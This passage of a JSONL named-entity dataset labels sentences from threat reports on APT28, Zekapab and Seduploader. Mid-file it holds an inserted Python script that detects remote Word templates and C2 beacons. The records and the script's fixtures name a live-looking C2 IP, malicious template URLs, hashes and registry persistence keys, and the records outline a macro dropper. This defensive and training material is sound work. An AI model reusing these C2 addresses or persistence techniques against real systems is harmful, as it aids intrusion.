Israel which is accused of involvement in the assassination of Mazen Fuqaha , and the Fatah party of which the Prime Minister and President of the Palestinian Authority are members .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 203, "end": 214, "label": "Organization"}, {"start": 264, "end": 285, "label": "Organization"}]} {"text": "The campaign corresponds with a period of heightened tension in Gaza .", "spans": []} {"text": "Hamas , who has historically maintained control over the strip , elected Yahya al-Sinwar \u2013 a hardliner from its military wing \u2013 as its leader in February .", "spans": [{"start": 0, "end": 5, "label": 
"Organization"}]} {"text": "A Humanitarian Bulletin published by the United Nations \u2019 Office for the Coordination of Humanitarian Affairs indicates in March 2017 ( just before the first malware samples associated with this campaign were identified in early April ) Hamas created \u201c a parallel institution to run local ministries in Gaza , \u201d", "spans": [{"start": 41, "end": 64, "label": "Organization"}, {"start": 73, "end": 109, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}]} {"text": "further straining the relationship between Hamas and the Palestinian Authority who governs the West Bank .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 57, "end": 78, "label": "Organization"}]} {"text": "After this announcement , the Palestinian Authority cut salaries for its employees in Gaza by 30 percent and informed Israel that it would no longer pay for electricity provided to Gaza causing blackouts throughout the area and escalating tensions between the rival groups .", "spans": [{"start": 30, "end": 51, "label": "Organization"}]} {"text": "Then , in early May ( two days after the last malware sample was submitted ) the Palestinian Authority held local elections in the West Bank which were reportedly seen as a test for the Fatah party .", "spans": [{"start": 81, "end": 102, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}]} {"text": "Elections were not held in Gaza .", "spans": []} {"text": "All of that is to say , the decoy documents leveraged in this campaign would likely be relevant and of interest to a variety of targets in Israel and Palestine , consistent with previously identified KASPERAGENT targeting patterns .", "spans": [{"start": 200, "end": 211, "label": "Malware"}]} {"text": "Additionally , the use of what appear to be carefully crafted documents at the very least designed to look like official government correspondence suggests the malware may have been intended 
for a government employee or contractor who would be interested in the documents \u2019 subject matter .", "spans": []} {"text": "APT28 : New Espionage Operations Target Military and Government Organizations .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 40, "end": 77, "label": "Organization"}]} {"text": "Recent campaigns see APT28 group return to covert intelligence gathering operations in Europe and South America .", "spans": [{"start": 21, "end": 26, "label": "Organization"}]} {"text": "After making headlines during 2016 due to its involvement in cyber attacks against an organization involved in the U.S. presidential election , APT28 ( aka Swallowtail , Fancy Bear ) has continued to mount operations during 2017 and 2018 .", "spans": [{"start": 120, "end": 141, "label": "Organization"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 156, "end": 167, "label": "Organization"}, {"start": 170, "end": 180, "label": "Organization"}]} {"text": "The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 50, "end": 81, "label": "Organization"}, {"start": 84, "end": 87, "label": "Organization"}, {"start": 98, "end": 129, "label": "Organization"}, {"start": 132, "end": 135, "label": "Organization"}]} {"text": "APT28 has been active since at least January 2007 but received public attention in a major way during 2016 when it was implicated in a series of cyber attacks in the run up to the U.S. 
presidential election .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 185, "end": 206, "label": "Organization"}]} {"text": "Beginning in the Spring of 2016 , APT28 sent spear-phishing emails to political targets including members of the Democratic National Committee ( DNC ) .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 60, "end": 66, "label": "System"}, {"start": 113, "end": 142, "label": "Organization"}, {"start": 145, "end": 148, "label": "Organization"}]} {"text": "These emails were designed to trick recipients into supposedly changing their email passwords on a fake webmail domain .", "spans": [{"start": 6, "end": 12, "label": "System"}, {"start": 78, "end": 83, "label": "System"}]} {"text": "The attack group then used these stolen credentials to gain access to the DNC network , install malware , move across the network , and steal data , including a trove of emails .", "spans": [{"start": 74, "end": 77, "label": "Organization"}, {"start": 170, "end": 176, "label": "System"}]} {"text": "The compromised information was later leaked online .", "spans": []} {"text": "These election attacks signaled a change of tactics on the part of APT28 , moving away from their prior low-key intelligence gathering towards more overt activity , seemingly intended to destabilize and disrupt victim organizations and countries .", "spans": [{"start": 67, "end": 72, "label": "Organization"}]} {"text": "The group was also responsible for the 2016 attack on the World Anti Doping Agency ( WADA ) and the leaking of confidential drug testing information .", "spans": [{"start": 58, "end": 82, "label": "Organization"}, {"start": 85, "end": 89, "label": "Organization"}]} {"text": "In keeping with its shift to more overt tactics , the group appeared to publicly take credit for the attack , leaking the information on a website using the name \u201c Fancy Bears \u201d , an industry codename that was already widely used for the group .", 
"spans": [{"start": 164, "end": 175, "label": "Organization"}]} {"text": "After receiving an unprecedented amount of attention in 2016 , APT28 has continued to mount operations during 2017 and 2018 .", "spans": [{"start": 63, "end": 68, "label": "Organization"}]} {"text": "However , the group \u2019s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering .", "spans": []} {"text": "The organizations targeted by APT28 during 2017 and 2018 include :", "spans": [{"start": 30, "end": 35, "label": "Organization"}]} {"text": "A well-known international organization Military targets in Europe Governments in Europe A government of a South American country An embassy belonging to an Eastern European country .", "spans": []} {"text": "APT28 uses a number of tools to compromise its targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "The group \u2019s primary malware is Sofacy , which has two main components .", "spans": [{"start": 32, "end": 38, "label": "Malware"}]} {"text": "Trojan.Sofacy ( also known as Seduploader ) performs basic reconnaissance on an infected computer and can download further malware .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 30, "end": 41, "label": "Malware"}]} {"text": "Backdoor.SofacyX ( also known as X-Agent ) is a second stage piece of malware , capable of stealing information from the infected computer .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 33, "end": 40, "label": "Malware"}]} {"text": "A Mac version of the Trojan also exists ( OSX.Sofacy ) .", "spans": [{"start": 2, "end": 5, "label": "System"}, {"start": 21, "end": 27, "label": "Malware"}, {"start": 42, "end": 52, "label": "Indicator"}]} {"text": "APT28 has continued to develop its tools over the past two years .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "For example , Trojan.Shunnael ( aka X-Tunnel ) , 
malware used to maintain access to infected networks using an encrypted tunnel , underwent a rewrite to .NET .", "spans": [{"start": 14, "end": 29, "label": "Indicator"}, {"start": 36, "end": 44, "label": "Malware"}, {"start": 153, "end": 157, "label": "System"}]} {"text": "In addition to this , as reported by our peers at ESET last week , the group has also begun using a UEFI ( Unified Extensible Firmware Interface ) rootkit known as Lojax .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 100, "end": 104, "label": "System"}, {"start": 107, "end": 144, "label": "System"}, {"start": 164, "end": 169, "label": "Malware"}]} {"text": "Because the rootkit resides within a computer \u2019s flash memory , it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled .", "spans": []} {"text": "Symantec products block attempts to install Lojax with the detection name Trojan.Lojax .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 44, "end": 49, "label": "Malware"}, {"start": 74, "end": 86, "label": "Indicator"}]} {"text": "Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 37, "end": 44, "label": "Organization"}]} {"text": "The group uses spear-phishing emails to compromise its targets and infect them with malware .", "spans": [{"start": 30, "end": 36, "label": "System"}]} {"text": "Earworm uses two malware tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Trojan.Zekapab is a downloader component that is capable of carrying out basic reconnaissance functions and downloading additional malware to the infected computer .", "spans": [{"start": 0, "end": 14, 
"label": "Indicator"}]} {"text": "Backdoor.Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}]} {"text": "Earworm has also on occasion installed additional tools onto infected computers for the purposes of keylogging and password capture .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "During 2016 , Symantec observed some overlap between the command and control ( C&C ) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe ( the U.S. government code name for APT28 and related actors ) , implying a potential connection between Earworm and APT28 .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 57, "end": 76, "label": "System"}, {"start": 79, "end": 82, "label": "System"}, {"start": 108, "end": 115, "label": "Organization"}, {"start": 124, "end": 127, "label": "System"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 271, "end": 278, "label": "Organization"}, {"start": 283, "end": 288, "label": "Organization"}]} {"text": "However , Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 67, "end": 72, "label": "Organization"}, {"start": 82, "end": 90, "label": "Organization"}]} {"text": "It is now clear that after being implicated in the U.S. 
presidential election attacks in late 2016 , APT28 was undeterred by the resulting publicity and continues to mount further attacks using its existing tools .", "spans": [{"start": 56, "end": 77, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}]} {"text": "After its foray into overt and disruptive attacks in 2016 , the group has subsequently returned to its roots , mounting intelligence gathering operations against a range of targets .", "spans": []} {"text": "This ongoing activity and the fact that APT28 continues to refine its toolset means that the group will likely continue to pose a significant threat to nation state targets .", "spans": [{"start": 40, "end": 45, "label": "Organization"}]} {"text": "Symantec has had the following protections in place to protect customers against APT28 attacks :", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 86, "label": "Organization"}]} {"text": "Trojan.Sofacy Backdoor.SofacyX Infostealer.Sofacy OSX.Sofacy Trojan.Shunnael Trojan.Lojax .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 14, "end": 30, "label": "Malware"}, {"start": 31, "end": 49, "label": "Malware"}, {"start": 50, "end": 60, "label": "Malware"}, {"start": 61, "end": 76, "label": "Malware"}, {"start": 77, "end": 89, "label": "Malware"}]} {"text": "The following protections are in place to protect customers against Earworm attacks :", "spans": [{"start": 68, "end": 75, "label": "Organization"}]} {"text": "Trojan.Zekapab Backdoor.Zekapab .", "spans": [{"start": 0, "end": 14, "label": "Malware"}, {"start": 15, "end": 31, "label": "Malware"}]} {"text": "A BREXIT-themed lure document that delivers ZEKAPAB malware .", "spans": [{"start": 44, "end": 51, "label": "Malware"}]} {"text": "SNAKEMACKEREL is an espionage-motivated cyber threat group , also known as Sofacy , Pawn Storm , Sednit , Fancy Bear , APT28 , Group 74 , Tsar Team , and Strontium .", "spans": [{"start": 0, "end": 13, 
"label": "Organization"}, {"start": 75, "end": 81, "label": "Organization"}, {"start": 84, "end": 94, "label": "Organization"}, {"start": 97, "end": 103, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 127, "end": 135, "label": "Organization"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}]} {"text": "Both the British and Dutch governments have publicly attributed SNAKEMACKEREL activities to the Russian military intelligence service ( RIS ) and have linked specific cyberattacks to the group , including the targeting of the Organisation for the Prohibition of Chemical Weapons ( OPCW ) , the United Kingdom Defence and Science Technology Laboratory ( DSTL ) and the United Kingdom Foreign and Commonwealth Office ( FCO ) .", "spans": [{"start": 64, "end": 77, "label": "Organization"}, {"start": 96, "end": 133, "label": "Organization"}, {"start": 136, "end": 139, "label": "Organization"}, {"start": 226, "end": 278, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 294, "end": 350, "label": "Organization"}, {"start": 353, "end": 357, "label": "Organization"}, {"start": 368, "end": 414, "label": "Organization"}, {"start": 417, "end": 420, "label": "Organization"}]} {"text": "According to the FBI , the SNAKEMACKEREL threat group \"is part of an ongoing campaign of cyber-enabled operations directed at the United States government and its citizens .", "spans": [{"start": 17, "end": 20, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}]} {"text": "These cyber operations have included spear phishing campaigns targeting government organizations , critical infrastructure entities , think tanks , universities , political organizations , and corporations , leading to the theft of information .", "spans": []} {"text": "The creation of this malicious document , coming 
on the same day that the UK government announced an initial agreed draft of the BREXIT agreement , suggests that SNAKEMACKEREL is a group that pays close attention to political affairs and is able to leverage the latest news headlines to develop lure documents to deliver first-stage malware , such as Zekapab , to its intended targets .", "spans": [{"start": 162, "end": 175, "label": "Organization"}, {"start": 351, "end": 358, "label": "Malware"}]} {"text": "The theme also reflects the targeting of the group which primarily focuses on NATO members , countries in Central Asia and those neighboring Russia .", "spans": [{"start": 78, "end": 82, "label": "Organization"}]} {"text": "Despite the public reporting and government accusations , SNAKEMACKEREL remains highly active .", "spans": [{"start": 58, "end": 71, "label": "Organization"}]} {"text": "It is behind a large number of cyberattacks targeting global aerospace and defense contractors , military units , political parties , the International Olympic Committee ( IOC ) , anti-doping agencies , government departments and various other verticals .", "spans": [{"start": 138, "end": 169, "label": "Organization"}, {"start": 172, "end": 175, "label": "Organization"}]} {"text": "NATO and EU member countries , as well as the United States , are of particular interest to the group .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 9, "end": 11, "label": "Organization"}, {"start": 46, "end": 59, "label": "Organization"}]} {"text": "SNAKEMACKEREL operations continue to be some of the most far-reaching and sophisticated cyber espionage and intelligence campaigns to date .", "spans": [{"start": 0, "end": 13, "label": "Organization"}]} {"text": "This report provides a technical overview of a BREXIT-themed lure Microsoft Office document that is used to drop a Delphi version of the Zekapab first-stage malware which has been previously reported by iDefense analysts .", "spans": [{"start": 66, "end": 75, "label": 
"Organization"}, {"start": 76, "end": 82, "label": "Organization"}, {"start": 115, "end": 121, "label": "System"}, {"start": 137, "end": 144, "label": "Malware"}, {"start": 203, "end": 211, "label": "Organization"}]} {"text": "However , additional research on the C2 server 109.248.148.42 revealed a new .NET version of Zekapab that is designed for the same purpose . iDefense analysts recently came across the following malicious document that is purportedly related to the recent BREXIT negotiations between the UK and the EU .", "spans": [{"start": 37, "end": 39, "label": "System"}, {"start": 47, "end": 61, "label": "Indicator"}, {"start": 77, "end": 81, "label": "System"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 298, "end": 300, "label": "Organization"}]} {"text": "Brexit 15.11.2018.docx :", "spans": [{"start": 0, "end": 22, "label": "Indicator"}]} {"text": "405655be03df45881aa88b55603bef1d .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}]} {"text": "Of note , the Company name Grizli777 is indicative of a cracked version of Microsoft Word .", "spans": [{"start": 27, "end": 36, "label": "Organization"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 85, "end": 89, "label": "System"}]} {"text": "To trick the targeted individual into enabling macros , the attackers deliberately used jumbled-up text as content .", "spans": []} {"text": "The document loads malicious content from http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm via the settings.xml.rels component that is embedded within the DOCX document .", "spans": [{"start": 42, "end": 110, "label": "Indicator"}, {"start": 119, "end": 136, "label": "Indicator"}, {"start": 175, "end": 179, "label": "System"}]} {"text": "The downloaded macro component includes a function called AutoClose() as well as two payloads embedded via Base64 encoded strings .", "spans": []} {"text": "Research on the malicious IP 
address 109.248.148.42 revealed two different .dotm components :", "spans": [{"start": 37, "end": 51, "label": "Indicator"}, {"start": 75, "end": 80, "label": "Indicator"}]} {"text": "Filename : attachedTemplate.dotm MD5 : 018611b879b2bbd886e86b62484494da Filename : templates.dotm MD5 : 2a794b55b839b3237482098957877326 .", "spans": [{"start": 11, "end": 32, "label": "Indicator"}, {"start": 39, "end": 71, "label": "Indicator"}, {"start": 83, "end": 97, "label": "Indicator"}, {"start": 104, "end": 136, "label": "Indicator"}]} {"text": "The two components are dropped from the following URLs respectively :", "spans": []} {"text": "http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm http://109.248.148.42/officeDocument/2006/relationships/templates.dotm .", "spans": [{"start": 0, "end": 68, "label": "Indicator"}, {"start": 69, "end": 139, "label": "Indicator"}]} {"text": "Both components contain an identical VBA macro code as shown above , each containing two different embedded payloads : one is an executable binary file and the other is a .docm file . attachedTemplate.dotm dropped the following :", "spans": [{"start": 37, "end": 40, "label": "System"}, {"start": 171, "end": 176, "label": "Indicator"}, {"start": 184, "end": 205, "label": "Indicator"}]} {"text": "Filename : ntslwin.exe MD5 : 7e67122d3a052e4755b02965e2e56a2e Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 . 
templates.dotm dropped the following :", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}, {"start": 73, "end": 88, "label": "Indicator"}, {"start": 95, "end": 127, "label": "Indicator"}, {"start": 130, "end": 144, "label": "Indicator"}]} {"text": "Filename : ntslwin.exe MD5 : a13c864980159cd9bdc94074b2389dda Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 .", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}, {"start": 73, "end": 88, "label": "Indicator"}, {"start": 95, "end": 127, "label": "Indicator"}]} {"text": "The second macro file ~de03fc12a.docm dropped includes a simple macro to execute the dropped executable .", "spans": [{"start": 22, "end": 37, "label": "Indicator"}]} {"text": "Analysis into the two binaries shows that they are in fact a Delphi ( initially UPX packed ) and .NET version of the Zekapab first-stage malware .", "spans": [{"start": 61, "end": 67, "label": "System"}, {"start": 80, "end": 83, "label": "System"}, {"start": 97, "end": 101, "label": "System"}, {"start": 117, "end": 124, "label": "Malware"}]} {"text": "The following network traffic is performed by the Delphi sample which has the following metadata once unpacked by UPX :", "spans": [{"start": 50, "end": 56, "label": "System"}, {"start": 114, "end": 117, "label": "System"}]} {"text": "Filename : ntslwin.exe MD5 : f4cab3a393462a57639faa978a75d10a .", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}]} {"text": "Exhibit 4 shows the network traffic generated by the sample , a http POST request containing the system information collected .", "spans": [{"start": 64, "end": 68, "label": "Indicator"}]} {"text": "On the other hand , the network traffic generated by the .NET version is unencoded .", "spans": [{"start": 57, "end": 61, "label": "System"}]} {"text": "Both versions are designed to collect system 
information and running processes and send them to the designated C2 server using http POST ; the URI used in both cases is /agr-enum/progress-inform/cube.php?res= .", "spans": [{"start": 111, "end": 113, "label": "System"}, {"start": 127, "end": 131, "label": "Indicator"}]} {"text": "If the system is deemed interesting , the next stage malware would be delivered into corresponding directories .", "spans": []} {"text": "Each version delivers the second-stage malware to a different destination and sets a corresponding autorun registry key .", "spans": []} {"text": "For the Delphi version , the following registry key and value are used for persistence :", "spans": [{"start": 8, "end": 14, "label": "System"}]} {"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Value : %AppData%\\Video\\videodrv.exe .", "spans": [{"start": 74, "end": 102, "label": "Indicator"}]} {"text": "For the .NET version , the following registry key and value are used for persistence :", "spans": [{"start": 8, "end": 12, "label": "System"}]} {"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin.exe .", "spans": [{"start": 79, "end": 108, "label": "Indicator"}]} {"text": "The list of information collected includes :", "spans": []} {"text": "Results from the commands systeminfo and tasklist ; Current execution path ; Capture screenshot ; Drive enumeration ; Drive serial number .", "spans": []} {"text": "The code for downloading and executing the next stage malware .", "spans": []} {"text": "As shown , the delivery of the next-stage malware is dependent on the information collected .", "spans": []} {"text": "To mitigate the threat described in this report , iDefense recommends blocking access to the IP address and URI pattern :", "spans": [{"start": 50, "end": 58, "label": "Organization"}]} {"text": "109.248.148.42 /agr-enum/progress-inform/cube.php?res= .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}]} 
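The Zekapab delivery chain iDefense describes above has two network-visible stages: the lure document pulling attachedTemplate.dotm through an external relationship in its settings.xml.rels part, and the host-survey POST to /agr-enum/progress-inform/cube.php?res= on 109.248.148.42. The following Python is an added detection example written for this page; it is not code from the iDefense report. The .docx parts and the proxy log lines are constructed inline (the log format, build_docx and the function names are assumptions for illustration); only the IP, URL and URI pattern come from the report.

```python
"""Added detection example for the Zekapab delivery chain (not iDefense code).

Stage 1: a .docx whose word/_rels/settings.xml.rels binds an attached template
         that lives off-host (remote template injection).
Stage 2: proxy log lines showing the template download and the cube.php?res= beacon.
Inputs are constructed inline so the script runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type that binds a document to its attached template.
ATTACHED_TEMPLATE_REL = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Targets on these prefixes leave the host; a local file:/// template is normal.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")

# IOCs taken from the report.
C2_IP = "109.248.148.42"
C2_TEMPLATE_URL = f"http://{C2_IP}/office/thememl/2012/main/attachedTemplate.dotm"
C2_BEACON_PREFIX = "/agr-enum/progress-inform/cube.php?res="
C2_URL_RE = re.compile(r"https?://" + re.escape(C2_IP) + r"(?::\d+)?(?P<path>/\S*)")


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return attachedTemplate targets in settings.xml.rels that point off-host."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return hits  # no settings relationships at all, nothing to inspect
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
        for rel in root.iter(REL_NS + "Relationship"):
            target = rel.get("Target", "")
            if rel.get("Type") == ATTACHED_TEMPLATE_REL and target.lower().startswith(REMOTE_PREFIXES):
                hits.append(target)
    return hits


def hunt_proxy_log(lines) -> list:
    """Flag lines whose URL is on the C2 host and label the stage by path.

    Assumed (constructed) line format: <timestamp> <client> <method> <url> <status>.
    Returns (line_number, path, stage) tuples.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = C2_URL_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        if path.startswith(C2_BEACON_PREFIX):
            stage = "beacon"             # systeminfo/tasklist survey POSTed as res=
        elif path.lower().endswith(".dotm"):
            stage = "template-download"  # macro template fetched by Word on open
        else:
            stage = "other"
        hits.append((n, path, stage))
    return hits


def build_docx(settings_rels_xml: str) -> bytes:
    """Build a minimal constructed .docx (not a real lure) around the given rels part."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml", f"<w:document xmlns:w='{w_ns}'/>")
        z.writestr("word/settings.xml", f"<w:settings xmlns:w='{w_ns}'/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one mirrors the lure, one is a normal local template.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_REL}" Target="{C2_TEMPLATE_URL}" TargetMode="External"/>
</Relationships>"""
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_REL}" Target="file:///C:/Users/analyst/Templates/Normal.dotm" TargetMode="External"/>
</Relationships>"""

# Constructed proxy log lines (not real traffic); only the first two touch the C2.
SAMPLE_PROXY_LOG = f"""\
2018-11-16T09:12:03Z 10.0.0.15 GET {C2_TEMPLATE_URL} 200
2018-11-16T09:12:41Z 10.0.0.15 POST http://{C2_IP}{C2_BEACON_PREFIX}U3lzdGVtSW5mbw== 200
2018-11-16T09:13:05Z 10.0.0.22 GET http://example.com/index.html 200
""".splitlines()

if __name__ == "__main__":
    for target in find_remote_templates(build_docx(MALICIOUS_RELS)):
        print("remote attached template:", target)
    for n, path, stage in hunt_proxy_log(SAMPLE_PROXY_LOG):
        print(f"proxy line {n}: {stage} {path}")
```

A benign attached template normally also carries TargetMode="External" with a file:/// path, so the scanner keys on the target's scheme rather than on the mode flag; the beacon match ignores the Base64 payload after res= because it varies per host. Both checks can be pointed at a directory of mail attachments or a day of proxy logs respectively without further changes.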
{"text": "For threat hunting , iDefense recommends searching for the following :", "spans": []} {"text": "Network : Presence of http and DNS traffic to the network IOCs shared above .", "spans": [{"start": 22, "end": 26, "label": "Indicator"}, {"start": 31, "end": 34, "label": "Indicator"}]} {"text": "System : Presence of the following artifacts .", "spans": []} {"text": "Persistence mechanism Registry Key :", "spans": []} {"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer .", "spans": []} {"text": "On disk artefacts File with the full path : %AppData%\\Video\\videodrv.exe File with the full path : %AppData%\\Platform\\sslwin.exe Files with following file hashes .", "spans": [{"start": 44, "end": 72, "label": "Indicator"}, {"start": 99, "end": 128, "label": "Indicator"}]} {"text": "\u201c Cyber Conflict \u201d Decoy Document Used In Real Cyber Conflict .", "spans": []} {"text": "Cisco Talos discovered a new malicious campaign from the well known actor Group 74 ( aka Tsar Team , Sofacy , APT28 , Fancy Bear ) .", "spans": [{"start": 74, "end": 82, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}]} {"text": "Ironically the decoy document is a deceptive flyer relating to the Cyber Conflict U.S. 
conference .", "spans": []} {"text": "CyCon US is a collaborative effort between the Army Cyber Institute at the United States Military Academy and the NATO Cooperative Cyber Defence Centre of Excellence .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 47, "end": 67, "label": "Organization"}, {"start": 75, "end": 105, "label": "Organization"}, {"start": 114, "end": 118, "label": "Organization"}, {"start": 119, "end": 165, "label": "Organization"}]} {"text": "Due to the nature of this document , we assume that this campaign targets people with an interest in cyber security .", "spans": []} {"text": "Unlike previous campaigns from this actor , the flyer does not contain an Office exploit or a 0-day ; it simply contains a malicious Visual Basic for Applications ( VBA ) macro .", "spans": [{"start": 133, "end": 162, "label": "System"}, {"start": 165, "end": 168, "label": "System"}]} {"text": "The VBA drops and executes a new variant of Seduploader .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 44, "end": 55, "label": "Malware"}]} {"text": "This reconnaissance malware has been used by Group 74 for years and it is composed of 2 files : a dropper and a payload .", "spans": [{"start": 45, "end": 53, "label": "Organization"}]} {"text": "The dropper and the payload are quite similar to the previous versions , but the author modified some publicly known characteristics , such as the MUTEX name and the obfuscation .", "spans": []} {"text": "We assume that these modifications were performed to avoid detection based on public IOCs .", "spans": []} {"text": "The article describes the malicious document and the Seduploader reconnaissance malware , especially the differences from the previous versions .", "spans": [{"start": 53, "end": 64, "label": "Malware"}]} {"text": "The decoy document is a flyer concerning 
the Cyber Conflict U.S. conference with the following filename Conference_on_Cyber_Conflict.doc .", "spans": [{"start": 104, "end": 136, "label": "Indicator"}]} {"text": "The Office document contains a VBA script .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 31, "end": 34, "label": "System"}]} {"text": "The goal of this code is to get information from the properties of the document ( \"Subject\" , \"Company\" , \"Category\" , \"Hyperlink base\" and finally \"Comments\" ) .", "spans": []} {"text": "Some of this information can be directly extracted from the Windows Explorer by looking at the properties of the file .", "spans": [{"start": 60, "end": 67, "label": "System"}]} {"text": "The \"Hyperlink Base\" must be extracted using another tool ; strings can obtain it by looking for long strings .", "spans": []} {"text": "Pay close attention to the contents of these fields as they appear base64 encoded .", "spans": []} {"text": "This extracted information is concatenated together to make a single variable .", "spans": []} {"text": "This variable is decoded with the base64 algorithm in order to get a Windows library ( PE file ) which is written to disk .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 87, "end": 89, "label": "System"}]} {"text": "The file is named netwf.dat .", "spans": [{"start": 18, "end": 27, "label": "Indicator"}]} {"text": "In the next step this file is executed by rundll32.exe via the KlpSvc export .", "spans": [{"start": 42, "end": 54, "label": "Indicator"}, {"start": 63, "end": 69, "label": "System"}]} {"text": "We see that this file drops 2 additional files : netwf.bat and netwf.dll .", "spans": [{"start": 49, "end": 58, "label": "Indicator"}, {"start": 63, "end": 72, "label": "Indicator"}]} {"text": "The final part of the VBA script changes the properties of these two files , setting their attributes to Hidden .", "spans": [{"start": 22, "end": 25, "label": "System"}]} {"text": "We can 
